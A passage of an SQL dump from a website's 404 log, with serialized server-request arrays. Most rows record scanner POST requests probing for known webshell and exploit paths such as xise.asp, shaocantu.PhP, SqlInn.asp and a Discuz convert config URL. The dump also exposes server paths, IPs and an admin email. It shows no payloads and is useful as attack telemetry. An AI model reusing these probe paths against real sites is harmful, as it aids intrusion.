16:35:07',35259168,37077848,'http://bintara.com.my/index.php/api/Uploadify/preview',1,0,'23.228.90.14'),(28416,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:52:\"/utility/convert/index.php?a=config&source=d7.2_x2.0\";s:14:\"CONTENT_LENGTH\";s:3:\"948\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:73:\"http://bintara.com.my/utility/convert/index.php?a=config&source=d7.2_x2.0\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:25:\"a=config&source=d7.2_x2.0\";s:21:\"REDIRECT_QUERY_STRING\";s:25:\"a=config&source=d7.2_x2.0\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xas7MPivEQeUaFKlM5ajtQAAAI4\";s:19:\"REDIRECT_SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xas7MPivEQeUaFKlM5ajtQAAAI4\";s:12:\"REDIRECT_URL\";s:18:\"/convert/index.php\";s:11:\"REMOTE_ADDR\";s:12:\"23.228.90.14\";s:11:\"REMOTE_PORT\";s:5:\"51543\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:10:\"SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xas7MPivEQeUaFKlM5ajtQAAAI4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571502896.4943\";s:12:\"REQUEST_TIME\";s:10:\"1571502896\";}}','notice','2019-10-19 16:34:58','2019-10-19 16:34:56',35284624,37091040,'http://bintara.com.my/utility/convert/index.php?a=config&source=d7.2_x2.0',1,0,'23.228.90.14'),(28415,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xas7KfBciE@oGFkw1scoiQAAAQo\";s:12:\"REDIRECT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"REMOTE_ADDR\";s:12:\"23.228.90.14\";s:11:\"REMOTE_PORT\";s:5:\"55938\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:10:\"SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xas7KfBciE@oGFkw1scoiQAAAQo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571502890.0239\";s:12:\"REQUEST_TIME\";s:10:\"1571502890\";}}','notice','2019-10-19 16:34:52','2019-10-19 16:34:50',35715448,37521000,'http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp',1,0,'23.228.90.14'),(28414,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"72.11.148.222\";s:11:\"REMOTE_PORT\";s:5:\"46874\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xaswq-ivEQeUaFKlM5ah5gAAAI0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571500203.6359\";s:12:\"REQUEST_TIME\";s:10:\"1571500203\";}}','notice','2019-10-19 15:50:06','2019-10-19 15:50:04',35313768,37119152,'https://bintara.com.my/?page_id=18',1,0,'72.11.148.222'),(28413,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"//plus/xise.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"211.167.137.166\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"211.167.137.166\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"http://bintara.com.my/plus/xise.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/plus/xise.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaspHfBciE@oGFkw1scjRAAAARA\";s:12:\"REDIRECT_URL\";s:14:\"/plus/xise.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"50863\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"http://bintara.com.my/plus/xise.asp\";s:10:\"SCRIPT_URL\";s:14:\"/plus/xise.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XaspHfBciE@oGFkw1scjRAAAARA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571498269.9204\";s:12:\"REQUEST_TIME\";s:10:\"1571498269\";}}','notice','2019-10-19 15:17:52','2019-10-19 15:17:50',35268536,37066456,'http://bintara.com.my//plus/xise.asp',1,0,'211.167.137.166'),(28411,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:73:\"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"108.161.131.48\";s:11:\"REMOTE_PORT\";s:5:\"65441\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xaso9gYF48xX3r6hM@mBDgAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571498230.5027\";s:12:\"REQUEST_TIME\";s:10:\"1571498230\";}}','notice','2019-10-19 15:17:12','2019-10-19 15:17:10',34921600,36731016,'https://bintara.com.my/?page_id=18',1,0,'108.161.131.48'),(28412,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"//plus/xise.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"220.115.16.181\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"220.115.16.181\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"http://bintara.com.my/plus/xise.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/plus/xise.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaspFfBciE@oGFkw1scjQAAAAQ4\";s:12:\"REDIRECT_URL\";s:14:\"/plus/xise.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"50863\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"http://bintara.com.my/plus/xise.asp\";s:10:\"SCRIPT_URL\";s:14:\"/plus/xise.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XaspFfBciE@oGFkw1scjQAAAAQ4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571498261.5275\";s:12:\"REQUEST_TIME\";s:10:\"1571498261\";}}','notice','2019-10-19 15:17:44','2019-10-19 15:17:42',35343768,37143904,'http://bintara.com.my//plus/xise.asp',1,0,'220.115.16.181'),(28410,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"//shaocantu.PhP\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"218.207.116.216\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"218.207.116.216\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"http://bintara.com.my/shaocantu.PhP\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/shaocantu.PhP\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xasot-BciE@oGFkw1scjCQAAARg\";s:12:\"REDIRECT_URL\";s:14:\"/shaocantu.PhP\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"65219\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"http://bintara.com.my/shaocantu.PhP\";s:10:\"SCRIPT_URL\";s:14:\"/shaocantu.PhP\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xasot-BciE@oGFkw1scjCQAAARg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571498167.1361\";s:12:\"REQUEST_TIME\";s:10:\"1571498167\";}}','notice','2019-10-19 15:16:10','2019-10-19 15:16:07',35266144,37068608,'http://bintara.com.my//shaocantu.PhP',1,0,'218.207.116.216'),(28409,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"//shaocantu.PhP\";s:14:\"CONTENT_LENGTH\";s:3:\"299\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"222.69.82.36\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"222.69.82.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"http://bintara.com.my/shaocantu.PhP\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/shaocantu.PhP\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XasoefBciE@oGFkw1sci@AAAAQU\";s:12:\"REDIRECT_URL\";s:14:\"/shaocantu.PhP\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"63541\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"http://bintara.com.my/shaocantu.PhP\";s:10:\"SCRIPT_URL\";s:14:\"/shaocantu.PhP\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XasoefBciE@oGFkw1sci@AAAAQU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571498105.7364\";s:12:\"REQUEST_TIME\";s:10:\"1571498105\";}}','notice','2019-10-19 15:15:09','2019-10-19 15:15:06',35267096,37069128,'http://bintara.com.my//shaocantu.PhP',1,0,'222.69.82.36'),(28408,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//admin/SqlInn.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"118.24.248.139\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"118.24.248.139\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/admin/SqlInn.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/admin/SqlInn.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XasoJPBciE@oGFkw1sci4QAAARI\";s:12:\"REDIRECT_URL\";s:17:\"/admin/SqlInn.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"60892\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/admin/SqlInn.asp\";s:10:\"SCRIPT_URL\";s:17:\"/admin/SqlInn.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XasoJPBciE@oGFkw1sci4QAAARI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571498020.5219\";s:12:\"REQUEST_TIME\";s:10:\"1571498020\";}}','notice','2019-10-19 15:13:42','2019-10-19 15:13:40',35268680,37069736,'http://bintara.com.my//admin/SqlInn.asp',1,0,'118.24.248.139'),(28407,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//admin/SqlInn.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; 